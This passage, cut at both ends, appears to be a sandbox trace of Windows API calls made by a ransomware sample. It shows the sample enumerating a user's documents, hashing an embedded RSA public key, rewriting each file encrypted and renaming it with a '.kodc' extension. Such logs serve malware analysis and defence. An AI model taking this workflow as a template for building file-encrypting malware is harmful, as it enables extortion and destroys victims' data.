out: hHeap=0x630000) returned 1 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.122] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x139bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.122] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.123] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.123] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.123] CloseHandle (hObject=0x5cc) returned 1 [0098.124] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AXprvG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\axprvg.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AXprvG.ots.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\axprvg.ots.kodc")) returned 1 [0098.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.125] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.126] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2908f6c0, ftCreationTime.dwHighDateTime=0x1d5c570, ftLastAccessTime.dwLowDateTime=0x89d90520, ftLastAccessTime.dwHighDateTime=0x1d5c0c1, ftLastWriteTime.dwLowDateTime=0x89d90520, ftLastWriteTime.dwHighDateTime=0x1d5c0c1, nFileSizeHigh=0x0, nFileSizeLow=0x1838a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cb35uL18.ppt", cAlternateFileName="")) returned 1 [0098.126] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cb35uL18.ppt") returned=".ppt" [0098.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cb35uL18.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cb35ul18.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.126] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=99210) returned 1 [0098.126] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.129] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18364, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.129] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.130] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.130] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1838a, lpOverlapped=0x0) returned 1 [0098.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.131] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.132] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.132] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.132] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.148] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.148] GetLastError () returned 0x0 [0098.148] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.148] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.148] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.148] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.148] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18390) returned 0x9ba4d90 [0098.148] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6480 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a868 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d61f8 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8c8 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.149] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8b0 | out: hHeap=0x630000) returned 1 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8c8 | out: hHeap=0x630000) returned 1 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a8c8 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a8b0 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8c8 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8b0 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.150] GetCurrentThreadId () returned 0x42c [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e548 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.150] GetCurrentThreadId () returned 0x42c [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8c8 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a898 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a8e0 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8b0 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8b0 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8c8 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a898 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a880 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d61f8 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.153] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x18385, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x18385, lpOverlapped=0x0) returned 1 [0098.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.154] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1838a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.154] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, 